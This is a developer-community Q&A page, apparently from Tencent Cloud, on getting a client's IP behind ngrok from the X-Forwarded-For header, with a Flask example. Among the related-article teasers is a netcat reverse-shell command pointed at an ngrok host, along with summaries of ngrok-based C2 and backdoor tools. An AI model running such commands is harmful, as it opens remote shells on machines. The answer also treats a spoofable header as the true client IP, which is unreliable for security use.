开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何在使用ngrok时获取传入请求的IP？

在使用ngrok时，可以通过查看请求头中的X-Forwarded-For字段来获取传入请求的IP地址。X-Forwarded-For是一个标准的HTTP请求头字段，用于指示客户端的原始IP地址。它在经过代理服务器或负载均衡器时会被添加到请求头中。

要获取传入请求的IP地址，可以通过以下步骤进行操作：

在ngrok的控制台中，启动ngrok并绑定到相应的本地服务端口。
在本地服务端口上监听传入请求。
在服务端代码中，解析HTTP请求头中的X-Forwarded-For字段，该字段的值即为传入请求的IP地址。

以下是一个示例代码，演示如何在使用ngrok时获取传入请求的IP地址：

from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def index():
    ip = request.headers.get('X-Forwarded-For', request.remote_addr)
    return f'The IP address of the incoming request is: {ip}'

if __name__ == '__main__':
    app.run()

在上述示例中，使用了Python的Flask框架来创建一个简单的Web应用。在路由处理函数中，通过request.headers.get('X-Forwarded-For', request.remote_addr)来获取传入请求的IP地址。如果请求头中没有X-Forwarded-For字段，则使用request.remote_addr获取默认的IP地址。

对于ngrok的具体使用方法和更多信息，可以参考腾讯云提供的内网穿透服务Tencent Cloud Tunnel的产品介绍：Tencent Cloud Tunnel产品介绍。

相关搜索:如何使用graph sdk而不是api在请求中传入$value来获取邮件的mime内容如何在Ansible中作为额外变量传递时获取主机的IP地址？如何在apache日志文件中获取每个ip地址的唯一请求总数如何在bruteforce模式下使用OWASP ZAP在授权请求时获取CSRF令牌如何在docker中使用symfony从请求中获取客户端ip 如何在groovy中使用Jenkins API获取Jenkins节点的ip 如何在传入指向函数的指针时从数组中获取值？如何在使用Lodash时获取特定的键值如何在使用overflow时获取scrollY的值？如何在使用PromiseKit时捕获请求中的错误？

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

【腾讯云的1001种玩法】轻松搭建内网穿透服务Ngrok

本文介绍如何使用ngrok服务进行内网穿透和域名映射,是一篇关于ngrok的教程类文章。

01

生产环境中使用ngrok：不仅仅用于测试

您已经了解 ngrok 如何为本地主机提供远程连接。现在，了解 ngrok 如何管理生产应用程序的流量。

01

你知道webhook吗？

二狗:是的，我最近在实习的公司要和Bigcommerce集成，我们需要让Bigcommerce在特定事件发生时回调我们的系统，以便我们能够及时处理相关数据。我想了解如何设置和处理这样的回调。

01

微信 JS-SDK 本地调试

最近在开发 h5 应用的时候，需要调起微信的扫一扫功能。那就得使用到微信的 JS-SDK，怎么在本地开发中，使用 JS-SDK 的功能呢？（功能不限于微信扫一扫）

01

仅需两步实现内网端口映射

昨天做好了https的连接，从智能音箱开发者后台配置了请求地址。一切ok，但是通过服务器调试仍然很麻烦。开发完成部署到服务器。开发者后台测试，失败。反复来搞太麻烦了。做过微信公众号开发的同学应该明白这个过程。

03

如何实现精准GPS定位IP及坐标，精确误差50m范围左右 - 信息搜集篇 - 渗透红队笔记

无论是在hvv期间的红队还是蓝队，又或者是在实际情况中，信息搜集是最为重要的。当你获取到足够多的情报那么你的任务就已经完成了一半。而你只需要想：我拿到信息之后能够如何去利用它？如何利用的行云流水这就看你如何运用了。

03

常见端口转发工具的使用方式（二）

Ngrok Ngrok一个反向代理，通过在公共的端点和本地端口建立一个安全的通道，其功能可以反向代理出web服务还有端口转发，这里我们主要演示端口转发的功能由于ngrok这个工具官网是要访问外国网站的，所以是能使用国内的Sunny-Ngrok 反弹nc shell 首先我们启动ngrok ./sunny clientid 隧道id 📷 本地监听端口： nc -vv -lp 9991 📷 目标机器： nc -vv server.ngrok.cc 33388 -e cm

08

Ngrok和树莓派绕过企业防火墙并访问内网主机实验

绝大多数安全研究人员所面临的一个常见问题，就是如何在目标网络部署了严格的企业级防火墙或路由器时，如何访问目标企业网络内的办公计算机或者本地设备。在很多情况下，我们的办公室电脑会在防火墙的保护下接入互联网。那么问题就来了，在默认情况下，它并不会允许来自外部网络的流量进入内网。这也就意味着，你可以使用办公室电脑与互联网中的外部主机进行通信，但远程设备却无法与你的办公室电脑连接。 PS：本文仅用于技术讨论与分享，严禁用于任何非法用途如果你想用家里的电脑访问办公室电脑中的文件或其他资料的话，这就非常令人头疼了

04

可以实现内网穿透的几款工具

最近没什么事情，看了一些关于内网穿透的文章，因我本身已是做微信开发相关的工作，对这部分关注的比较多，现分享给大家。

01

【戴嘉乐 IPFS】（进阶）基于IPFS和Ngrok构建自维护资源网关

上篇文章《（入门）基于IPFS和Ngrok构建自维护资源网关》，我们通过Ngrok为IPFS节点配置HTTP Tunnels，充分利用了其NAT穿越的特性，成功搭建了属于自己的资源网关，为他人提供IPFS节点服务。但是这仅仅是一个雏形，缺陷还很多，这篇文章来讲解对资源网关的种种优化和配置。

01

Ngrok + Metasploit = 暂时性隐蔽C2

大家好，这里是渗透攻击红队的第 55 篇文章，本公众号会记录一些红队攻击的笔记（由浅到深），不定时更新

02

【群友】Ngrok让你的本地Web应用暴露在公网上

1.Ngrok介绍 Ngrok是一个反向代理，通过在公共的端点和本地运行的Web服务器之间建立一个安全的通道。Ngrok可捕获和分析所有通道上的流量，便于后期分析和重放。简单来说，利用 Ngrok可以通过外网来访问部署在本地服务器的网站，它还提供一个Web管理页来监控HTTP通信报文，方便程序员发现问题、开发调试。另外Ngrok还支持TCP层端口映射，不局限于某一特定的服务。支持Mac OS X，Linux，Windows平台。 📷 Ngrok 官方网站：https://ngrok.com/

06

内网穿透神器：Ngrok在支付中的正确使用姿势

随着互联网的发展，无论是web服务还是移动APP越来越多的都集成了第三方支付(支付宝、微信、银联)。通常作为服务提供方，支付成功以后都会有一个后端回调URL来通知是否调用者是否支付成功，这个URL必须是公网环境，并且可以被访问到。然而在实际开发测试环境中，我们一般都是在内网开发，所以说对于支付测试是一件比较麻烦的事情。

03

ubuntu搭建内网穿透服务Ngrok

说些闲话：最近一直在乱折腾，看看C，看看Python，又打算去看一下PHP，然后又是前端的Vue.Js，最后发现——嗯？我都在干些什么？当然不论是在做什么，看什么，基本上还是在学习，这个状态还是比较满意的。值得一提的是，当我发现bash的好用之处后，毫不犹豫的就把我的开发环境迁移到了还算是比较熟悉的Linux发行版本——Ubuntu上。然后就开始了在Ubuntu上的折腾之旅。因为是用虚拟机搭建的Ubuntu，所以绝大多数情况下，开着VM使用虚拟机的感觉和真机体验差别并不大，虽然有考虑收购一台二手笔记

07

如何从Django应用程序发送Web推送通知

网络不断发展，现在可以实现以前只能在本机移动设备上使用的功能。JavaScript 服务工作者的引入为Web提供了新的功能，可以执行后台同步，脱机缓存和发送推送通知等功能。

【戴嘉乐】（进阶）基于IPFS和Ngrok构建自维护资源网关

上篇文章《【应用】（入门）基于IPFS和Ngrok构建自维护资源网关》，我们通过Ngrok为IPFS节点配置HTTP Tunnels，充分利用了其NAT穿越的特性，成功搭建了属于自己的资源网关，为他人提供IPFS节点服务。但是这仅仅是一个雏形，缺陷还很多，这篇文章来讲解对资源网关的种种优化和配置。

01

使用Ngrok将本地服务映射为公网服务

这篇文章将为大家介绍ngrok，如何安装，配置以及在什么场景下需要使用ngrok。在没有使用过Ngrok之前，您可能会遇到过这样一些情况

01

微服务架构开发实战：分布式消息总线，实现配置信息的自动更新

在上一篇文章中节演示了集成Spring Cloud Bus 的过程。在示例中，当微服务实例启动的时候，可以去加载最新的配置信息。当时这种做法有一定的局限性，即只有在应用启动的过程中才能获取到配置。

02

内网穿透神器：Ngrok在支付中的正确使用姿势

前言随着互联网的发展，无论是web服务还是移动APP越来越多的都集成了第三方支付(支付宝、微信、银联)。通常作为服务提供方，支付成功以后都会有一个后端回调URL来通知是否调用者是否支付成功，这个URL必须是公网环境，并且可以被访问到。然而在实际开发测试环境中，我们一般都是在内网开发，所以说对于支付测试是一件比较麻烦的事情。内网穿透这时候，我们就需要内网穿透服务来解决第三方服务无法回调的问题了，下面我们来稍微盘点那些流行的内网穿透技术。 Ngrok ngrok 是一个反向代理，通过在公共的端点和本地运

03

"0元搞定！手把手教你建网站，简单得就像泡桶方便面一样，上线个人网站轻而易举！"

没有服务器和公网IP，想要其他人访问自己做好的网站，该怎么办？今天教大家使用这款简单免费的内网穿透小工具——ngrok，有了它轻松让别人访问你的项目~

01

windows下内网穿透工具Ngrok安装与使用

Ngrok是内网穿透的工具，简而言之就是将内网IP映射成对外可访问的域名。Ngrok 是一个反向代理，通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量，便于后期分析和重放。它是内网穿透的跳板之一。

01

有了内网穿透神器 ngrok ，个人电脑也能做服务器

平常我们访问的网站都是由具有公网ip的服务器提供的，如果想做自己的网站也得要有个自己的服务器（当然也可以使用GitHub这种做静态网站，下次可以说说），其实服务器简单来说也就是一台电脑而已，那可不可以将自己的电脑做服务器呢？答案是可以的，这里推荐一个免费的内网穿透神器 ngrok，关于什么是内网穿透看百科解释：

02

ngrok 是什么，我们为什么要使用它？

ngrok是一个全球分布的反向代理，无论您在哪里运行，它都能保护、保护和加速您的应用程序和网络服务。您可以将ngrok视为应用程序的前门。

01

不用服务器，1 分钟上线网站！

之前反复跟大家强调过，想要让自己简历上的项目经历显得更真实，最好是把项目上线并且提供地址给招聘方访问。

05

网络之NAT 和N2N V**

N2N V** 应用指南 N2N 是一个P2P的开源V**项目，具有内网穿透成功率高，去中心化，流量加密，使用简单的特点，在笔者公司内部已经有近3年的使用经验，实践证明，N2N具备较为优秀的稳定性和安全性,，具备低成本替代专线需求的能力。在笔者的实践经验中，N2N用在多IDC之间的网络互通，多IDC上容器网络的互通。表现的都很出色。

03

搭建WEB版Kali Linux渗透系统

安装完后，我们需要新建一个账户，因为shellinabox默认不允许直接用root登录，我们可以用adduser添加一个自己喜欢的账号，例：

05

Cozmo人工智能机器人SDK使用笔记（9）-判断部分if_this_then_that

此示例演示了如何使用“If This Then That”（http://ifttt.com）使Cozmo在Gmail帐户收到电子邮件时作出回应。以下说明将引导您在IFTTT网站上设置小程序。当调用applet触发器（发送在此示例中启动的Web服务器收到的Web请求）时，Cozmo将播放动画，说出电子邮件发件人的姓名并在他的脸上显示邮箱图像。

03

【戴嘉乐 IPFS】（入门）基于IPFS和Ngrok构建自维护资源网关

由于一些特殊原因，ipfs.io网关在天朝无法访问，之前在外做宣讲的时候，也被很多朋友问到ipfs.io是否一直会被禁的问题，纷纷表示担忧，这边通过一个简单的Demo，让大家可以搭建属于自己的协议网关，通过这种方式，我们跑在IPFS上的资源将不在受限，并且每个人都可以独立出自己的节点服务并分享给其他人、应用程序访问使用。

01

Hacking with Golang

根据一篇报道显示，golang 成为继 python 之后最受黑客欢迎的工具语言。而且和 python 的差距正在缩小。golang 具有一些 python 的优势：开发块，跨平台；同时又有 python 不具有的优势：运行效率高，在暴力破解，端口扫描，爬虫等等场景，编程语言的运行效率还是很重要的。

私人云盘搭建手记（三）

使用家庭宽带的用户，大多都没有外网IP，本期就来聊聊怎么使用反向代理，让你的私人云盘能在外网访问，反向代理其实还有很多用途，感兴趣可以去搜索引擎查一查。

01

云服务器搭建自己的ngrok服务-实现内网穿透

优点：限制少，可玩性高，安全性高，完全可以删除花生壳、向日葵、TeamViewer等软件了。

01

在密码重置请求包中添加X-Forwarded-Host实现受害者账户完全劫持

今天分享的这篇Writeup为作者通过利用目标网站“忘记密码”功能，在重置密码请求发包中添加X-Forwarded-Host主机信息，欺骗目标网站把重置密码的链接导向到自己的服务器，从而实现对受害者账户的完全劫持。

02

技术分析|XXE环境搭建及实战包含有回显无回显操作

搭建说明：安装xampp后，htdocs目录放入靶机项目，然后开启apache、mysql访问即可

01

推荐一款实现内网穿透的测试神器：Ngrok

工作日：年底基本被各种PPT准备、2019年总结、2020年规划、各种公司年底会议所覆盖。

03

nodejs微信公众号开发

网上关于node开发公众号的资料相当缺乏，本文旨在以node的视角对公众号开发做一个阐述。

09

使用ngrok内网穿透工具

这时可以使用ngrok工具。他可以分配给你一个公网的二级域名，来绑定你本地的正在跑的http服务。比如我本地跑了一个vue cli搭建的程序，跑起来后默认是 http://localhost:8080 。当我安装 ngnok 后，执行 ./ngrok http 8080 (Windows系统下可能是ngrok.exe)

03

Centos7搭建ngrok服务端以及配置客户端

由于学校部分内网与跟外网不通，所以在校园网或者外网的情况下，连接不到内网服务器，看不了内网的网站。但是有时候我会需要在自己宿舍或者家里连接学校的内网服务器，看一下内网网站，一开始想到的是内网服务器搭建ss服务器，然后一想，怎么对外网IP映射端口呢，我又没有路由器权限。想来想去，还是直接用内网穿透的工具吧。

01

day8 | 如何将我的服务开放给用户 | 第三届字节跳动青训营笔记

这是我参与「第三届青训营 -后端场」笔记创作活动的的第8篇笔记。计算机网络真的是太庞大了

01

「玩转树莓派」搭建属于自己内网穿透服务

好吧，我承认这个跟树莓派没有半毛关系，但是为了以后众多内网应用可以被访问，还是想强行发生一波关系。

02

WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线

Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞，被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件，该文件自 2005 年发布至今就从未有过更新过，影响时长长达十余年之久。本篇文章鄙人会使用图文+视频的教程来给各位不知道利用的小粉们讲一下，视频教程在文末尾处。

02

挖洞经验 | 开放重定向漏洞导致的账户劫持

最近，在测试目标网站https://target.com的过程中，作者通过综合其Web应用存在的开放重定向、路径遍历和CSRF漏洞，最终实现了账户劫持。

02

APT攻击演练之捕鱼人的构想

两个环节:beef-xss钓鱼环节(建议使用服务器)、Nday钓鱼环节(很好用)、钓鱼框架环节(便携好用)

04

springboot项目打包&ngrok的使用

接触spring boot有一段时间了，但是一直未打包部署过spring boot项目，因为其内置tomcat，所以打包部署方式有所不同。还有ngrok，是一个类似于花生壳的内网穿透神器，本文也将介绍它的用法。

02

ngrok+nginx实现内网穿透

写在前面: 前天在qq群里看到有人在讨论替代花生壳的工具，说到了ngrok，说是可以实现花生壳一样的内网穿透，个人认为主要有以下几个用处: 可以在公司测试服务器上搭建一个服务,实现测试站点的本地访问

07

内网穿透你真的了解吗？

内网穿透你真的了解吗？ http://zoo.zhengcaiyun.cn/blog/article/intranet-penetration

01

Grok-backdoor：一款支持Ngrok隧道的强大Python后门工具

Grok-backdoor是一款支持Ngrok隧道的强大Python后门工具，该工具基于Python开发，使用了Ngrok隧道来实现C&C通信。值得一提的是，当前版本的Grok-backdoor支持使用Pyinstaller生成Windows、Linux和Mac后门源码。

03

「小程序JAVA实战」小程序和后台api通信（28）

开发最重要的就是实操！小程序和后台api通信小程序不能直接访问后台接口必须通过请求的方式通过内网穿透实现暴露到公网 ngrok ngrok.com 如何使用内网穿透登录ngrok网站 http

04

一种有趣的帐户接管手段

关于获取他人帐户的控制权，我曾在网上学习了不少前辈的经验和技巧，而在花费了6到8个小时后，我在目标站redacted.com的忘记密码页面中找到了一些可利用的痕迹，并最终找到了一个可接管他人帐户的漏洞。

01

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭